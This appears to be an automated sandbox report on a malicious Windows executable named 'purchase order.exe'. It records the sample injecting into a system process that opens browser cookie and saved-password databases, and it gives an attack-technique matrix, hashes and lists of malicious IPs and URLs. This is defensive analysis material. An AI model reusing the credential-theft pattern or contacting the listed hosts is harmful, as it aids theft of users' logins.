                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 3.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\cacls.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\cacls.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\cacls.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\cacls.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\cacls.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\cacls.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\cacls.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\cacls.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\cacls.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 3.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Services File Permissions Weakness (1) | Process Injection (412) | Masquerading (1) | OS Credential Dumping (1) | Security Software Discovery (121) | Remote Services | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Services File Permissions Weakness (1) | Virtualization/Sandbox Evasion (41) | Security Account Manager | Virtualization/Sandbox Evasion (41) | SMB/Windows Admin Shares | Data from Local System (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (1) | Process Injection (412) | NTDS | File and Directory Discovery (2) | Distributed Component Object Model | Input Capture | Application Layer Protocol (4) | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | System Information Discovery (113) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Abuse Elevation Control Mechanism (1) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (4) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Services File Permissions Weakness (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Software Packing (12) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | DLL Side-Loading (1) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                [Behavior graph, ID 1569753. Sample: purchase order.exe; Start date: 06/12/2024; Architecture: WINDOWS; Score: 100. Process chain: purchase order.exe (started) → purchase order.exe (started) → olMGHvjsNFhNU.exe (injected) → cacls.exe (started) → olMGHvjsNFhNU.exe (injected) and firefox.exe (started).]

                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | purchase order.exe | 34% | ReversingLabs | | |
                | purchase order.exe | 40% | Virustotal | | Browse |
                | purchase order.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569753
Start date and time: 2024-12-06 09:30:35 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: purchase order.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@7/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 200
• Number of non-executed functions: 303
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target olMGHvjsNFhNU.exe, PID 5332 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
                                                                                                            • 13.248.169.48
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 13.248.169.48
                                                                                                            Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            www.gk88top.topattached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.7.187
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 104.21.7.187
                                                                                                            1hong.pels5zqo.shopattached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 129.226.153.85
                                                                                                            PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                                                                            • 129.226.153.85
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 43.163.1.110
                                                                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                            • 43.163.1.110
                                                                                                            www.golivenow.liveattached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 66.29.149.46
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 66.29.149.46
                                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 66.29.149.46
                                                                                                            www.christinascuties.netattached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 74.208.236.156
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 74.208.236.156
                                                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 74.208.236.156
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            NTT-LT-ASLTOpportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msgGet hashmaliciousUnknownBrowse
                                                                                                            • 84.32.84.93
                                                                                                            iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                            • 84.32.84.100
                                                                                                            iGxCM2I5u9.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 84.32.84.122
                                                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            http://editableslides.coGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                            • 84.32.84.208
                                                                                                            Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 84.32.53.129
                                                                                                            attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 84.32.84.32
                                                                                                            AMAZONEXPANSIONGBhttps://www.calameo.com/read/00783464726989e2a209aGet hashmaliciousUnknownBrowse
                                                                                                            • 3.33.220.150
                                                                                                            https://www.nomadaproducciones.com/hzGet hashmaliciousUnknownBrowse
                                                                                                            • 3.33.130.190
                                                                                                            MGQeZjDXc3.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 3.33.130.190
                                                                                                            https://ness.wiktripfitness.com/ghjki9l-8765t4/3/er4t5y6u7jyhtgrfefrgthyjuyhtgdsarfedwsqaGet hashmaliciousUnknownBrowse
                                                                                                            • 52.223.40.198
                                                                                                            s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 3.33.130.190
                                                                                                            QiGA4zxp7h.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 3.33.130.190
                                                                                                            https://tippfloorcovering-my.sharepoint.com/:f:/g/personal/inderjeet_tippfloor_com/EpEIzIGDzrlMs2z8rWgki5MBO5-d64iEaOqqeF3ulFqTiw?e=T39wglGet hashmaliciousUnknownBrowse
                                                                                                            • 52.223.52.2
                                                                                                            https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                                                                                            • 52.223.40.198
                                                                                                            maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                            • 3.33.130.190
                                                                                                            biosetGet hashmaliciousUnknownBrowse
                                                                                                            • 52.223.13.41
                                                                                                            AMAZON-02USmain_mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 13.218.109.96
                                                                                                            https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2Get hashmaliciousUnknownBrowse
                                                                                                            • 52.77.73.5
                                                                                                            main_arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 108.143.162.104
                                                                                                            main_mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 54.181.79.156
                                                                                                            main_sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 52.219.131.157
                                                                                                            https://do.not.click.on.this.link.instantrevert.net/XSEg2WDlKd2JCRDJOMWtwUGE5L0dpYzEyZUF0UjVQWmNQaWl2Q21KaDZSeUhuKzhLc243eHpPN1h4NjVNTnAzblZ6ZFZhaGwydDB1ZHJNUnQ5S25RRk0yTEtDbkhEZUlDZ29KY3lveXU2YW9kWkxheHEvTm1wWU5tWjUvT0lGZHkvR3k2MXBCbkYxdmJkZWl2NnNHa1dFcTFVd29uTklraVNkNHdISUFEbCszRE9tc3RETjdZSXdsaWl3PT0tLWJIaFJQTDlXUWhZQ0V6eWMtLWtnaFdmOHAzRW9zTE12VmNnY2lDS2c9PQ==?cid=2314349904Get hashmaliciousKnowBe4Browse
                                                                                                            • 13.227.8.37
                                                                                                            https://online.coverages.best/informations.html?via=PTonRVU7RklJK0ZJTzAmQVk9NllEODZFRTsmNVY4NzFPPEJZQztWVCA=Get hashmaliciousUnknownBrowse
                                                                                                            • 13.209.60.147
                                                                                                            bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 65.11.249.192
                                                                                                            https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                                                                            • 3.5.133.203
                                                                                                            https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                                                                            • 3.5.128.104
                                                                                                            CLOUDFLARENETUSpe61BNJmLf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            https://l.user-edenred-meyclub.kadeos.com/rts/go2.aspx?h=3782162&tp=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ&pi=6DvBMG0gjxmwWZBUOtvVSRjwHoaoPzxcEck6D3-7U78&x=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ%7c612254%7c1175284778&hp2=b88d9aa5cea778a386a66e248545bc7b83591c6077edf33fe6b47536c9d63d12Get hashmaliciousUnknownBrowse
                                                                                                            • 104.18.16.32
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.9
                                                                                                            PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 172.67.74.152
                                                                                                            https://do.not.click.on.this.link.instantrevert.net/XSEg2WDlKd2JCRDJOMWtwUGE5L0dpYzEyZUF0UjVQWmNQaWl2Q21KaDZSeUhuKzhLc243eHpPN1h4NjVNTnAzblZ6ZFZhaGwydDB1ZHJNUnQ5S25RRk0yTEtDbkhEZUlDZ29KY3lveXU2YW9kWkxheHEvTm1wWU5tWjUvT0lGZHkvR3k2MXBCbkYxdmJkZWl2NnNHa1dFcTFVd29uTklraVNkNHdISUFEbCszRE9tc3RETjdZSXdsaWl3PT0tLWJIaFJQTDlXUWhZQ0V6eWMtLWtnaFdmOHAzRW9zTE12VmNnY2lDS2c9PQ==?cid=2314349904Get hashmaliciousKnowBe4Browse
                                                                                                            • 104.17.25.14
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                            • 104.21.67.152
                                                                                                            No context
                                                                                                            No context
                                                                                                            Process:C:\Users\user\Desktop\purchase order.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                            Process:C:\Windows\SysWOW64\cacls.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.8022518515367825
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:purchase order.exe
                                                                                                            File size:738'304 bytes
                                                                                                            MD5:79bfe4cd6855c69c57c3b6b3a2ad898f
                                                                                                            SHA1:f8e1d7de0aa66ac4a38d5b63d5e125d869ffe7a4
                                                                                                            SHA256:c8040b1741912e0e0ecf072a20889dea7c880b6dfa1d0d1579c996a99779ac1f
                                                                                                            SHA512:6a2698eec1eb1f35dc8686fd97cceb8cb90a41209625cee73bef420d9006139ea053df17af532773646e2f448437f330df0d5f5d44285838363aea426fa1dd36
                                                                                                            SSDEEP:12288:qPG+bXCyRhdsE2DqaE9g1YEsWzKPY0oPaGZNej8P/2okxa/Ot8Mf9juewH:2yyPsLDqaE9g1bjePY0oS5k2JxFy4U
                                                                                                            TLSH:9AF412696692D50ACA8127B41EB0F2BC77FC4E9EA901D3035FDDADEBBC3AD145C88141
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...abRg..............0..,...........J... ...`....@.. ....................................@................................
Icon Hash: 04852062591b5659
Entrypoint: 0x4b4ab6
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67526261 [Fri Dec 6 02:33:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            push ebx
                                                                                                            add byte ptr [ecx+00h], bh
                                                                                                            jnc 00007F69D50A75C2h
                                                                                                            je 00007F69D50A75C2h
                                                                                                            add byte ptr [ebp+00h], ch
                                                                                                            add byte ptr [ecx+00h], al
                                                                                                            arpl word ptr [eax], ax
                                                                                                            je 00007F69D50A75C2h
                                                                                                            imul eax, dword ptr [eax], 00610076h
                                                                                                            je 00007F69D50A75C2h
                                                                                                            outsd
                                                                                                            add byte ptr [edx+00h], dh
                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb4a64 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb6000 | 0x13bc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb2adc | 0xb2c00 | 0544d70ef86ea8aa278e8015637eab75 | False | 0.9363076376748252 | OpenPGP Public Key | 7.809008568803863 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb6000 | 0x13bc | 0x1400 | 71325526bfa90631d6d0eab19a90cb5f | False | 0.732421875 | data | 6.944321747106777 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb8000 | 0xc | 0x200 | 2343a4d9132ecfe6c5af1a83c5499ddb | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb6100 | 0xd91 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8692772818888569
RT_GROUP_ICON | 0xb6ea4 | 0x14 | data | | | 1.05
RT_VERSION | 0xb6ec8 | 0x2f4 | data | | | 0.43386243386243384
RT_MANIFEST | 0xb71cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
